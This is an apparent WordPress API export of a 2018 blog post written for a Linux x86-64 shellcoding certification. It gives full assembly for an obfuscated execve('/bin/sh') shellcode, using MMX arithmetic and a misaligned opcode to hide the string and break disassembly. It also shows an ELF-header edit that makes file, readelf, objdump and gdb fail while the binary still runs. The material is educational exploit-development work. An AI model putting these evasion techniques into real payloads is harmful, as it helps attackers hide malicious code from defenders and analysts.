{"id":247,"date":"2018-02-25T11:40:56","date_gmt":"2018-02-25T10:40:56","guid":{"rendered":"http:\/\/pentester.blog\/?p=247"},"modified":"2019-08-18T19:48:51","modified_gmt":"2019-08-18T17:48:51","slug":"slae64-assignment-bonus-obfuscated-shellcode-and-unique-trick","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=247","title":{"rendered":"SLAE64 &#8211; Assignment #Bonus &#8211; Obfuscated shellcode and unique trick"},"content":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:<\/p>\n<p>http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html<\/p>\n<p>Student ID: PA-6470<\/p>\n<h2>Assignment #Bonus<\/h2>\n<p>So here are additional things I did for fun \ud83d\ude42<\/p>\n<h3>Obfuscated shellcode<\/h3>\n<p>First is a shellcode that uses some obfuscation techniques, such as:<\/p>\n<ul>\n<li>MMX instructions<\/li>\n<li>misaligned opcodes to break objdump disassembly<\/li>\n<li>additions to hide the real values<\/li>\n<li>the stack to store data instead of the data segment<\/li>\n<\/ul>\n<pre>; This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; $ nasm -f elf64 sc64.nasm -o sc64.o\r\n; $ ld sc64.o -o sc64\r\n;\r\n; 64-bit Linux execve syscall parameters:\r\n;\r\n; %rax  System call   %rdi                   %rsi                       %rdx\r\n; 0x3b  sys_execve    const char *filename   const char *const argv[]   const char *const envp[]\r\n\r\nglobal _start\r\n\r\n_start:\r\n        ; \/bin\/sh in reverse order is hs\/nib\/, which is 0x68732f6e69622f in hex\r\n        ; Obfuscate this value with a simple byte-wise addition:\r\n        ;   68 73 2f 6e 69 62 2f\r\n        ; - 50 53 01 42 4a 50 02   X value\r\n        ; = 18 20 2e 2c 1f 12 2d   Y value\r\n        jmp begin+1                 ; skip the stray 0xe9 byte placed at begin\r\n\r\nbegin:\r\n        db 0xe9                     ; 0xe9 is the opcode of jmp rel32: a linear disassembler swallows the next 4 bytes as its operand, so the listing is misaligned\r\n\r\n        mov rcx, 0x505301424a5002   ; X value\r\n        movq mm0, rcx               ; build the string value in MMX registers for obfuscation\r\n        mov rcx, 0x18202e2c1f122d   ; Y value (the top byte stays 0 and becomes the NUL terminator)\r\n        movq mm1, rcx\r\n        paddusb mm0, mm1            ; byte-wise unsigned saturating add of mm0 and mm1, reconstructing hs\/nib\/\r\n        movq rcx, mm0\r\n        emms                        ; clear the MMX state so the FPU can be used again\r\n        xor rdx, rdx                ; envp = NULL\r\n        mov al, 0x30                ; stage 0x30 in al (execve is 0x3b); argv (rsi) and the upper bytes of rax are not set: the code relies on them being 0 at process entry\r\n        push rcx                    ; push the NUL-terminated \/bin\/sh string onto the stack\r\n        lea rdi, [rsp]              ; filename = address of the string on the stack\r\n        add al, 0x0b                ; 0x30 + 0x0b = 0x3b (execve syscall)\r\n        syscall                     ; make the syscall<\/pre>\n<h3>Unique trick<\/h3>\n<p>Second is a technique I found myself while working on the Linux ELF format.<\/p>\n<p>I noticed that it&rsquo;s possible to change some bytes in the ELF file header without altering the normal execution of the program. For instance, you can make your executable claim to be 32-bit even though it is really a 64-bit one. You can also mark your binary as built for a big-endian platform even though that is not true. This technique may be useful against reverse engineering.<\/p>\n<p>To alter the header you can use any hex editor, such as hexcurse.<\/p>\n<p>The 5th byte defines the format: 32-bit (1) or 64-bit (2).<\/p>\n<p>The 6th byte defines the endianness: LSB (1) or MSB (2).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-22\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2017\/12\/Capture-d%E2%80%99e%CC%81cran-2017-12-29-a%CC%80-22.04.30.png\" alt=\"\" width=\"1834\" height=\"308\" \/><\/p>\n<p class=\"p1\">Alter the ELF header, save it and run your shellcode: you&rsquo;ll see that it runs like a charm.<\/p>\n<p class=\"p1\">However, the standard Linux tools such as <strong>file, readelf, objdump, gdb<\/strong> <strong>ALL FAIL!<\/strong><\/p>\n<pre><strong>file sc64<\/strong>\r\nsc64elf: ELF 32-bit MSB *unknown arch 0x3e00* (SYSV)<\/pre>\n<pre>En-t\u00eate ELF:\r\n  Magique:   7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 \r\n  Classe:                            <strong>ELF32<\/strong>\r\n  Donn\u00e9es:                          compl\u00e9ment \u00e0 2, syst\u00e8me \u00e0 octets de poids fort d'abord (<strong>big endian<\/strong>)\r\n  Version:                           1 (current)\r\n  OS\/ABI:                            UNIX - System V\r\n  Version ABI:                       0\r\n  Type:                              : 200\r\n  Machine:                           : 0x3e00\r\n  Version:                           0x1000000\r\n  Adresse du point d'entr\u00e9e:         0x80004000\r\n  D\u00e9but des en-t\u00eates de programme\u00a0:  0 (octets dans le fichier)\r\n  D\u00e9but des en-t\u00eates de section :    1073741824 (octets dans le fichier)\r\n  Fanions:                           0x0\r\n  Taille de cet en-t\u00eate:             53249 (octets)\r\n  Taille de l'en-t\u00eate du programme:  0 (octets)\r\n  Nombre d'en-t\u00eate du programme:     0\r\n  Taille des en-t\u00eates de section:    0 (octets)\r\n  Nombre d'en-t\u00eates de section:      0\r\n  Table d'indexes des cha\u00eenes d'en-t\u00eate de section: 0\r\n<strong>readelf: AVERTISSEMENT: en-t\u00eate ELF peut-\u00eatre endommag\u00e9 \u2013 il a un offset non nul pour l'en-t\u00eate de section mais pas d'en-t\u00eate de section<\/strong><\/pre>\n<pre><strong>objdump -M intel -D .\/sc64<\/strong>\r\nobjdump: .\/sc64: Fichier tronqu\u00e9\r\n<\/pre>\n<pre><strong>gdb .\/sc64<\/strong> \r\nGNU gdb (Debian 7.12-6) 7.12.0.20161007-git\r\nCopyright (C) 2016 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law.  Type \"show copying\"\r\nand \"show warranty\" for details.\r\nThis GDB was configured as \"x86_64-linux-gnu\".\r\nType \"show configuration\" for configuration details.\r\nFor bug reporting instructions, please see:\r\n&lt;http:\/\/www.gnu.org\/software\/gdb\/bugs\/&gt;.\r\nFind the GDB manual and other documentation resources online at:\r\n&lt;http:\/\/www.gnu.org\/software\/gdb\/documentation\/&gt;.\r\nFor help, type \"help\".\r\nType \"apropos word\" to search for commands related to \"word\"...\r\n<strong>\"\/root\/shellcodes\/.\/sc64\": not in executable format: Fichier tronqu\u00e9<\/strong>\r\n(gdb)<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html Student ID: PA-6470 Assignment #Bonus So here are additional things I did for fun \ud83d\ude42 Obfuscated shellcode First is a shellcode that uses some obfuscation techniques, such as: MMX instructions misaligned opcodes to break objdump &hellip; <a href=\"https:\/\/hacktarus.fr\/?p=247\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">SLAE64 &#8211; Assignment #Bonus &#8211; Obfuscated shellcode and unique trick<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-247","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=247"}],"version-history":[{"count":11,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/247\/revisions"}],"predecessor-version":[{"id":285,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/247\/revisions\/285"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}